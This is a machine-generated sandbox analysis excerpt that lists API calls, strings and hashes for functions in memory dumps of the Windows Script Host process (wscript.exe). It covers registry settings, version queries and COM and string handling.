                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Delete$String$Close$Open$FreeFromType$LoadMallocQueryRegisterValuesprintf_s
                                            • String ID: $1.0$CLSID$LocalServer32$ProgID$TypeLib$Version
                                            • API String ID: 418931453-1178591435
                                            • Opcode ID: 7ef939d21fc885bef61398a8ba5d9cbbc4e1807d95107d0ee56103b188679847
                                            • Instruction ID: 642d7948b7c1683e81779ff8604dd1fe4d7bb354d41015c43627a825a80148e3
                                            • Opcode Fuzzy Hash: 7ef939d21fc885bef61398a8ba5d9cbbc4e1807d95107d0ee56103b188679847
                                            • Instruction Fuzzy Hash: 23F15D71A10225DFDB209B64DD89FAEB7B9BF4C714F1440A9E609A7261CF309D82CF51
                                            APIs
                                              • Part of subcall function 009C2196: GetACP.KERNEL32(00000000,009B10C4,009BA948,?,00000000,00000000), ref: 009C21A4
                                            • LoadLibraryExW.KERNEL32(kernel32.dll,00000000,00000800), ref: 009BA9A5
                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 009BA9BB
                                            • FreeLibrary.KERNEL32(00000000), ref: 009BA9CC
                                              • Part of subcall function 009B9456: SysAllocString.OLEAUT32(?), ref: 009B9534
                                              • Part of subcall function 009B9456: SysFreeString.OLEAUT32(?), ref: 009B97B0
                                            • FreeLibrary.KERNEL32(00000000), ref: 009BA9F8
                                            • CoRegisterMessageFilter.OLE32(00000000,00000008), ref: 009BAA41
                                            • GetModuleFileNameW.KERNEL32(?,00000105), ref: 009BAA70
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: FreeLibrary$String$AddressAllocFileFilterLoadMessageModuleNameProcRegister
                                            • String ID: HeapSetInformation$Open2$W$kernel32.dll
                                            • API String ID: 1008295733-585330253
                                            • Opcode ID: 515e1b99015d9f562263821de777af4cac4dd4231f4ce0e4cce0db48ab4ed3bf
                                            • Instruction ID: ee6c08068f690a483fccc65571e3b9b8896d1f43263187f4a60324da3a0d2cb4
                                            • Opcode Fuzzy Hash: 515e1b99015d9f562263821de777af4cac4dd4231f4ce0e4cce0db48ab4ed3bf
                                            • Instruction Fuzzy Hash: 04F1C2706083819FDB20DF24C989BEE7BE9AF84324F15085DE88A97292DB74DC45CB57
                                            APIs
                                            • GetFileVersionInfoSizeW.VERSION(009B1100,00000000,-00000001,009B1100,009B10C4), ref: 009BA4A1
                                            • GetLastError.KERNEL32 ref: 009BA4AD
                                            • __alloca_probe_16.LIBCMT ref: 009BA4C1
                                            • GetFileVersionInfoW.VERSION(009B1100,00000000,00000000), ref: 009BA4CE
                                            • VerQueryValueW.VERSION(?,009B3BE0,?,00000001), ref: 009BA4E6
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,009B1100,000000FF,00000000,00000000,00000000,00000000,-00000001,009B1100,009B10C4), ref: 009BA522
                                            • __alloca_probe_16.LIBCMT ref: 009BA532
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,009B1100,000000FF,?,00000000,00000000,00000000), ref: 009BA54F
                                            • GetFileVersionInfoSizeA.VERSION(?,00000000,?,00000000,00000000,00000000), ref: 009BA562
                                            • __alloca_probe_16.LIBCMT ref: 009BA572
                                            • GetFileVersionInfoA.VERSION(?,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000), ref: 009BA57F
                                            • VerQueryValueA.VERSION(?,009B3BE4,?,00000001,?,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000), ref: 009BA59B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: FileInfoVersion$__alloca_probe_16$ByteCharMultiQuerySizeValueWide$ErrorLast
                                            • String ID:
                                            • API String ID: 467288509-0
                                            • Opcode ID: 243a9a29c14dc68df186b29cf5d7efc6c99c836029d8df7bebd0570c5746274b
                                            • Instruction ID: 5b64ad2aff05b866ab573ba48a9c81579368f6ee8e0612d7904525c7f892393d
                                            • Opcode Fuzzy Hash: 243a9a29c14dc68df186b29cf5d7efc6c99c836029d8df7bebd0570c5746274b
                                            • Instruction Fuzzy Hash: B6319CB1A14219BF9B10DFA5DD88EFF7BBDEF493207104129B812D3250DA74DE008AB2
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 1ffe2921d759a7bb53210af29d2ffcc0ff949be3801e6029305dd4f7357f643b
                                            • Instruction ID: f5fca33ce1d09ab4c379bc4cbff9b30ed014a4a25c9d619eda44f2265c41e367
                                            • Opcode Fuzzy Hash: 1ffe2921d759a7bb53210af29d2ffcc0ff949be3801e6029305dd4f7357f643b
                                            • Instruction Fuzzy Hash: 3951E8B6B00116BFDB10DFA9899097EF7B8BB09704B10C269E4A5D7741E234FE108BE1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 316f0bc4e3313f2c618bd8dcc661455c9876d2a2276fd213fbc1b057d1b0c9a6
                                            • Instruction ID: 22755625dc0b7b20d85bac44e7e5e976d921338c3b4fe88144547aeefd9ffc3a
                                            • Opcode Fuzzy Hash: 316f0bc4e3313f2c618bd8dcc661455c9876d2a2276fd213fbc1b057d1b0c9a6
                                            • Instruction Fuzzy Hash: 29510571B40645AFDB34DF9CCC9087FBBF9EB44204B048499E6D6E7651EA74FA408B60
                                            APIs
                                            • RegQueryValueExW.ADVAPI32(00000000,Enabled,00000000,?,?,?,00000000,00000000,Enabled), ref: 009C5C99
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,Enabled), ref: 009C5CE0
                                            • GetLastError.KERNEL32 ref: 009C5CEC
                                            • __alloca_probe_16.LIBCMT ref: 009C5CF6
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,?,00000000,00000000,00000000), ref: 009C5D0E
                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,00000000,00000000,Enabled), ref: 009C5D4E
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000400), ref: 009C5DB2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$QueryValue$ErrorLast__alloca_probe_16
                                            • String ID: Enabled$false
                                            • API String ID: 421531244-109718029
                                            • Opcode ID: 1a7a681517d863d4e8da9bbaced968bb5b289e55ae9a223580c8ccddad4e0e20
                                            • Instruction ID: 596ca5c014d08bf204c519e7a9ddc19cfcd74339c7b6d43db032c7166edcd2f9
                                            • Opcode Fuzzy Hash: 1a7a681517d863d4e8da9bbaced968bb5b289e55ae9a223580c8ccddad4e0e20
                                            • Instruction Fuzzy Hash: 8251C770E04615AAEB24DB25CC44FBBB77DEB85310F21839DA556D3190EF30AEC4CA61
                                            APIs
                                            • GetClassInfoA.USER32(00000000,WSH-Timer,?), ref: 009BFD34
                                            • RegisterClassA.USER32(?), ref: 009BFD60
                                            • SetEvent.KERNEL32(?), ref: 009BFD6E
                                            • GetLastError.KERNEL32 ref: 009BFD74
                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000001,00000001,00000000,00000000,?), ref: 009BFD94
                                            • SetEvent.KERNEL32(?), ref: 009BFDA6
                                            • DispatchMessageA.USER32(?), ref: 009BFDB7
                                            • GetMessageA.USER32(?,?,00000000,00000000), ref: 009BFDC5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ClassEventMessage$CreateDispatchErrorInfoLastRegisterWindow
                                            • String ID: WSH-Timer
                                            • API String ID: 2425405920-2323048385
                                            • Opcode ID: 6c40e18f60ef256074887c2ec320305c11794a1a214346a2c3a2141a0566f9fa
                                            • Instruction ID: 7b792206f8eb9dd360382407023410e422aa87bdf2dbe859d962f738cb336336
                                            • Opcode Fuzzy Hash: 6c40e18f60ef256074887c2ec320305c11794a1a214346a2c3a2141a0566f9fa
                                            • Instruction Fuzzy Hash: 5521D4B1D14209ABCF209FA6DD4CDEFBBB8EFD4760B14452AF451A2260D7749806DB60
                                            Strings
                                            • ExecuteOptions, xrefs: 04DD46A0
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04DD4725
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04DD4742
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04DD4655
                                            • Execute=1, xrefs: 04DD4713
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04DD46FC
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 04DD4787
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 0672e4799af2155ec458b71a4765b59d5909093030c29342c8593ef803f38dc2
                                            • Instruction ID: ebcdd4696c4492d64730fef849e16c99b6b074f0fd3c73114e9cb0e63be51ae4
                                            • Opcode Fuzzy Hash: 0672e4799af2155ec458b71a4765b59d5909093030c29342c8593ef803f38dc2
                                            • Instruction Fuzzy Hash: C851C231750219BBEF10BEA5DC99BEE77E8FB44304F0405A9E505EB191EB70BE458E60
                                            APIs
                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 009C1CD0
                                            • wcscpy_s.MSVCRT ref: 009C1CEC
                                            • wcscat_s.MSVCRT ref: 009C1CF9
                                            • SetErrorInfo.OLEAUT32(00000000,00000000), ref: 009C1EB3
                                              • Part of subcall function 009C792D: malloc.MSVCRT ref: 009C7945
                                            • VariantInit.OLEAUT32(?), ref: 009C1E10
                                            • VariantCopy.OLEAUT32(?,?), ref: 009C1E43
                                            • VariantClear.OLEAUT32(?), ref: 009C1F0C
                                            • SysFreeString.OLEAUT32(00000000), ref: 009C1F3E
                                            • SysFreeString.OLEAUT32(?), ref: 009C1F4C
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: StringVariant$Free$AllocClearCopyErrorInfoInitmallocwcscat_swcscpy_s
                                            • String ID:
                                            • API String ID: 3780719979-0
                                            • Opcode ID: 60cb83b754af6201a6bd4e50efdaa9d11aa068bb6b1e5c7c259e12e50bee37b2
                                            • Instruction ID: 288e1b07427264ed5749a6d7a345dc05d0a347cbd50a1b5d6a82fd99dc824052
                                            • Instruction Fuzzy Hash: 6DC16871E00219AFCB14CF98D884EAEBBB5FF49710F25416DE906AB291D730AD42CB95
                                            APIs
                                            • GetFullPathNameW.KERNEL32(009C2AFB,00000104,?,?,00000104,?,?,?,?,?), ref: 009C50EC
                                            • GetLastError.KERNEL32 ref: 009C50FA
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,009C2AFB,000000FF,00000000,00000000,00000000,00000000,00000104,?,?,?,?,?), ref: 009C5121
                                            • __alloca_probe_16.LIBCMT ref: 009C512D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ByteCharErrorFullLastMultiNamePathWide__alloca_probe_16
                                            • String ID:
                                            • API String ID: 187176378-0
                                            • Opcode ID: 0438331cde612927d66eaab81012524c67b2b44236ad0b0710bdcad0ad12ebdd
                                            • Instruction ID: 74d5df49db650b0e9882e922a94822b4816a1df3f0484dc2e8bb266605c865a7
                                            • Instruction Fuzzy Hash: CE31D235E19525BB9B209B6A8C4CFAB7F6CEF86760B154128B819D6290CA30DE41C7F1
                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,009B8FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74,?,00000000,?,00000000), ref: 009C5873
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74), ref: 009C589D
                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,009BBB74,?,00000000,?,00000000,?,?,?,009B8FB7,00000000,00000000), ref: 009C58AA
                                            • __alloca_probe_16.LIBCMT ref: 009C58B4
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,009BBB74,?,00000000,?,00000000), ref: 009C58C8
                                            • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,009B8FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74,?,00000000,?,00000000), ref: 009C58DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiOpenWide$ErrorLast__alloca_probe_16
                                            • String ID: Software\Microsoft\Windows Script Host\Settings
                                            • API String ID: 2927149995-2126348837
                                            • Opcode ID: a4fd208ac849d61bca4a5b9748e9f19da60ec1c205ecdd2950df959ae8ecd12d
                                            • Instruction ID: 94972d9ebbef1b1a87f0956d08f757b9bdd8e9555c956c065adfe09254a566e0
                                            • Instruction Fuzzy Hash: 26112674E18611BFEB209B725C08F7B7ABCEF447A0F11852DB816D6190DA70EC40E6B1
                                            APIs
                                            • RegCreateKeyExW.ADVAPI32(00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,00000000,00000000,?,00000000,-00000001,?,009B10C4,00000000,00000000,?,009C21E8), ref: 009C5933
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,-00000001,?,009B10C4,00000000,00000000,?,009C21E8,00020019), ref: 009C5955
                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,009C21E8,00020019,00000000,009B1100,?,?,?,009BAB73,80000002,009B10E4), ref: 009C5961
                                            • __alloca_probe_16.LIBCMT ref: 009C596B
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,009C21E8,00020019,00000000,009B1100,?,?), ref: 009C5982
                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,009C21E8,00020019), ref: 009C599B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ByteCharCreateMultiWide$ErrorLast__alloca_probe_16
                                            • String ID: Software\Microsoft\Windows Script Host\Settings
                                            • API String ID: 3071801306-2126348837
                                            • Opcode ID: f71b8b0e38af77e8eda9a3cb11ca18c8b73d509a106390c7aa5c3a747ec70adf
                                            • Instruction ID: 26de9c37eb8e0d1eaa2c359624d078e53a5e63e71fdda50dc734c211b056da0c
                                            • Instruction Fuzzy Hash: 3311BE31A1A534FB9B219B678C0CFEB7EACEF4B7B0B514119B419D1190DA349A00E6F2
                                            APIs
                                              • Part of subcall function 009C792D: malloc.MSVCRT ref: 009C7945
                                            • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 009C41EA
                                            • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 009C4209
                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 009C42B3
                                            • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 009C42CF
                                            • VariantClear.OLEAUT32(?), ref: 009C42DB
                                            • SysAllocString.OLEAUT32(?), ref: 009C431F
                                            • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 009C4343
                                            • VariantClear.OLEAUT32(?), ref: 009C434F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ArraySafe$AllocClearCreateElementStringVariant$malloc
                                            • String ID:
                                            • API String ID: 2320673430-0
                                            • Opcode ID: a5990a205694e4d3def1185d9f2d54908ce5914e7f143ebda44067fc23b38f03
                                            • Instruction ID: 4b5d97ec91d0365d24cfc74c4d097cdbaa08b6fcedd42619f3cc58abb721dccc
                                            • Instruction Fuzzy Hash: C7719C71F0021A9BDB14CFA4D9A5FAEB7F8EF98710F54442EE951E7280DB709A42CB41
                                            APIs
                                            • malloc.MSVCRT ref: 009C4064
                                            • SysStringLen.OLEAUT32(?), ref: 009C4087
                                            • SysAllocString.OLEAUT32(?), ref: 009C4095
                                            • SysStringLen.OLEAUT32(?), ref: 009C40A5
                                            • SysAllocString.OLEAUT32(?), ref: 009C40B2
                                            • SysFreeString.OLEAUT32(?), ref: 009C40C8
                                            • SysFreeString.OLEAUT32(?), ref: 009C40D7
                                            • free.MSVCRT(00000000,?,009C3EE1,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C40DE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: String$AllocFree$freemalloc
                                            • String ID:
                                            • API String ID: 945414394-0
                                            • Opcode ID: 97d02045c55eb69f145546862f376af88026c0ff601d7fcbb2566f8304fe90dc
                                            • Instruction ID: 994f35206dcb84454ec4973327c553b9623536110b702d675fbbbc04c5279339
                                            • Instruction Fuzzy Hash: 76113A31A84606ABDB31DF25EC18F46BBA5EF04360F10892DF9A5926A0DB31D861DA52
                                            APIs
                                            • SysFreeString.OLEAUT32(?), ref: 009B97B0
                                              • Part of subcall function 009B99DC: CoCreateInstance.OLE32(009B3980,00000000,00000017,009B3BD0,009B1324,00000000,009B10C4,00000001,009B10C4,?,009B94CB,-00000001,009B1100), ref: 009B9A0A
                                              • Part of subcall function 009BFDD5: GetCurrentThreadId.KERNEL32 ref: 009BFE04
                                              • Part of subcall function 009C50BE: GetFullPathNameW.KERNEL32(009C2AFB,00000104,?,?,00000104,?,?,?,?,?), ref: 009C50EC
                                              • Part of subcall function 009C50BE: GetLastError.KERNEL32 ref: 009C50FA
                                            • SysAllocString.OLEAUT32(?), ref: 009B9534
                                            • SysAllocString.OLEAUT32(?), ref: 009B9554
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: String$Alloc$CreateCurrentErrorFreeFullInstanceLastNamePathThread
                                            • String ID: .wsf
                                            • API String ID: 1820159607-2429851548
                                            • Opcode ID: 480196faafd58bf724b396aac96c34fd4b7d7d66475b6aa870e4a7ce067949b8
                                            • Instruction ID: fd106a4dce22a284660213e6ae2c532a153470a97afdc4296f94c60db0911d05
                                            • Instruction Fuzzy Hash: FF91F430B202199BDB209F65DED8BEE77E9AF98724F1000A9E609D7351DF74ED418B50
                                            APIs
                                            • SysFreeString.OLEAUT32(?), ref: 009BF2AB
                                            • SysFreeString.OLEAUT32(?), ref: 009BF2B4
                                            • SysFreeString.OLEAUT32(?), ref: 009BF2BD
                                            • SysFreeString.OLEAUT32(?), ref: 009BF2C6
                                            • SysFreeString.OLEAUT32(?), ref: 009BF2CF
                                            Strings
                                            • WScript_OnScriptTerminate, xrefs: 009BF20E
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: FreeString
                                            • String ID: WScript_OnScriptTerminate
                                            • API String ID: 3341692771-526745235
                                            • Opcode ID: 2dd08eb44f380ccdedcf3afb593475542753785530e8718685757380864c0a8c
                                            • Instruction ID: b204b234801a56f827c34904d70b3aa97d6dabeb54e22d31967d94bb22485646
                                            • Instruction Fuzzy Hash: 4F918175A10209EFCB14DF98DDA5AEE7BB6FF48314F100069E612A7390DB70AD41CB54
                                            APIs
                                            • SysFreeString.OLEAUT32(?), ref: 009BD6F1
                                            • SysFreeString.OLEAUT32(?), ref: 009BD6FA
                                            • SysFreeString.OLEAUT32(?), ref: 009BD703
                                            • SysFreeString.OLEAUT32(?), ref: 009BD70C
                                            • SysFreeString.OLEAUT32(?), ref: 009BD715
                                            Strings
                                            • WScript_OnScriptTerminate, xrefs: 009BD651
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: FreeString
                                            • String ID: WScript_OnScriptTerminate
                                            • API String ID: 3341692771-526745235
                                            • Opcode ID: d8824c983057a60700de372b7e99a00dbd6ea8dc2048dd3a14c8b4fac4df4414
                                            • Instruction ID: 9cd483cbec36774cbc9b265f8e85c4091b4f4da810594f3af7a74526de530759
                                            • Instruction Fuzzy Hash: 7881A1B1A11205EFCF18DF94D999AAE7BB6FF48324F100069F516A73A0EB74AD01CB50
                                            APIs
                                              • Part of subcall function 009C5846: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,009B8FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74,?,00000000,?,00000000), ref: 009C5873
                                            • RegCloseKey.ADVAPI32(?,00000000,-00000001,009B1100,009B10C4), ref: 009BBDC4
                                            • RegCloseKey.ADVAPI32(00000000,00000000,-00000001,009B1100,009B10C4), ref: 009BBDD2
                                              • Part of subcall function 009C5C39: RegQueryValueExW.ADVAPI32(00000000,Enabled,00000000,?,?,?,00000000,00000000,Enabled), ref: 009C5C99
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Close$OpenQueryValue
                                            • String ID: IgnoreUserSettings$Software\Microsoft\Windows Script Host\Settings$TrustPolicy$UseWINSAFER
                                            • API String ID: 1607946009-2293819020
                                            • Opcode ID: 34e5add2057677f7558d4bb7fd4c457596ab80d0e1b25c0caa847d59c7bfbf25
                                            • Instruction ID: 6c4ab8a67258778fed48bf4a5445b509ba51b0971f5e0875218c0cbb32cbba9b
                                            • Instruction Fuzzy Hash: A9316EB4F0524DABDB14DAA58691BEEBBBD9FC4320B4840AD9841A32C1D779EE05C720
                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(?,00000000), ref: 009BC9B0
                                            • GetLastError.KERNEL32 ref: 009BC9BC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: DirectoryErrorLastSystem
                                            • String ID:
                                            • API String ID: 3081803543-0
                                            • Opcode ID: c441e804adc4097fec968ca2328a0a01f81ae1cc9b70073c7f487c8cd02bd5c3
                                            • Instruction ID: ce930688bfcdc9db63e6ecb5207aa772054ee0a451fab02afc5f858d7270eb33
                                            • Instruction Fuzzy Hash: FB210AB6A04216AFDB05DFA8CC49EBEB7BDFF85320B11446AE846D7311DA30DC018B60
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 009C3158
                                            • SysFreeString.OLEAUT32(?), ref: 009C31A9
                                            • SysFreeString.OLEAUT32(?), ref: 009C31B2
                                            • SysFreeString.OLEAUT32(?), ref: 009C31BB
                                            • SysFreeString.OLEAUT32(00000000), ref: 009C31DE
                                            • SysFreeString.OLEAUT32(00000000), ref: 009C31ED
                                            • free.MSVCRT(?,?,?,?,?,?,?,?,?,009C3110), ref: 009C31F4
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: FreeString$ArrayDestroySafefree
                                            • String ID:
                                            • API String ID: 1006837209-0
                                            • Opcode ID: 02bf3767008051ebd79358f75d93f165295c8287bc7552c838fafd0583ee6607
                                            • Instruction ID: 1a47742a71865700386a4c4eeb1c7d55adb39db31cb2a167185d5632b3a4f912
                                            • Instruction Fuzzy Hash: A7219E71A18100EFCB258F18D98CF587BF9FF48324B19C0ACE9568B261CB319D41DB52
                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383},00000000,00000001,?,?), ref: 009C711A
                                            • RegQueryValueExW.ADVAPI32(?,Locale,00000000,00000000,?,00000006,00000000), ref: 009C7137
                                            • RegCloseKey.ADVAPI32(?), ref: 009C7142
                                            • _wcsnicmp.MSVCRT ref: 009C715A
                                            Strings
                                            • Locale, xrefs: 009C712F
